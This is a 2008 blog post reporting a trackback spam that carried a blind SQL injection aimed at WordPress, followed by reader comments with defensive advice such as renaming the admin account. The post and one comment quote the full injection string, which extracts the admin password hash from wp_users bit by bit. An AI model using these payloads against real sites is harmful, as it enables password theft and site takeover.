WP Plugins and Widgets For Wordpress 2.1+

Attack of the Wordpress-Hacking Spam Trackbacks

June 7th, 2008 by Elliott Back

So this is a cute comment I got, a trackback spam that’s also a SQL injection exploit for Wordpress. Check it out:

Website: ‘ AND 1=0) UNION SELECT 1 FROM wp_users WHERE user_login=’admin’ and substring(reverse(lpad(conv(substring(user_pass,8,1), 16, 2),4,’0′)),4,1)=’1′ /* (IP: 124.217.250.190 , svservers.com)

URI: http://None

Excerpt: None…

It appears to be a known-cryptotext or weak-hash exploit against Wordpress looking for an admin password with an obvious signature. Cute.

Posted in Spam

Tagged with

10 Responses to “Attack of the Wordpress-Hacking Spam Trackbacks”

  1. Effe58@gmail.com says:

    Im managing my friends blog, and I found this just a few moments ago. Im currently logged in as admin. Is there anything to worry about, or is this just another failed SQL injection

  2. Jason says:

    Thanks Sebastian. http://codex.wordpress.org/Users_Authors_and_Users_SubPanel is the official writeup of what you suggest.

    @Cody – probably a separate username / password setup in Control panel. Look under protected directories depending on what Cp you use.

    @hot gadgets changing the default user name from admin to something else means that the attackers have to look for both a user name and a password which increases the complexity.

    If they already know there is a user called admin then part of their problem is solved.

  3. azrin says:

    Actually, someone found a fraud backlink code which disables comments from any IP ranging in the list of Hosting Providers.

    Meaning… if IP=(LIST)&REQUEST_URI=WP-COMMENT.PHP then it’s been redirected to another page automatically. Mainly, renaming your wp-comment.php normally solves this issue.(except multi-blogs)

    azrin @ http://www.chat.nu

  4. Hot gadgets says:

    How changing admins solves the problem?

  5. Cody says:

    All of a sudden my WordPress blog is showing a “Restricted Access” popup window asking all visitors to my site to provide a username and password.

    Does anyone know is this is some sort of spam attack?

    If so, can anyone tell me where to look in my admin panel to fix this?

    I posted this question over at the WordPress forum but got no responses and the info I’ve seen in the WordPress troubleshooting forum didn’t clear up my question.

    Thanks in advance!

  6. Freelocale says:

    People should be sharing more free things like this. Its what keeps the Internet buzzin’.

  7. Sara says:

    spammers are so frustrating.isnt there some way to get rid of them

  8. You must change your admins username to secure your blog.

    1. create new user and give him admin rights.
    2. log out and log in with new user account and delete old admin account. but attention: when deleting the old account it asks you to move your posts to the new account. check yes!

    Sebastian
    Knowtebook

  9. artcoder says:

    So is this a WP security hole in 2.5.1 of Wordpress? Or has the hole been plugged up by now.

    Can I prevent that SQL injection by disabling trackbacks?

  10. pamQ says:

    I’m managing my friend’s blog, and I found this just a few moments ago. I’m currently logged in as admin. Is there anything to worry about, or is this just another failed SQL injection?

    This is what I got:

    ‘ AND 1=0) UNION SELECT 1 FROM wp_users WHERE user_login=’admin’ and substring(reverse(lpad(conv(substring(user_pass,1,1), 16, 2),4,’0′)),1,1)=’1′ /* | None | IP: 124.217.227.127

    None…

    None…

    Thanks!

Leave a Reply

Powered by WP Hashcash

Search Posts


Categories

Blogroll

WP Hashcash

  • By Elliott Back
  • 971716 spam comments blocked out of 19391 human comments. 98.04% of your comments are spam!

Admin

Links

Feeds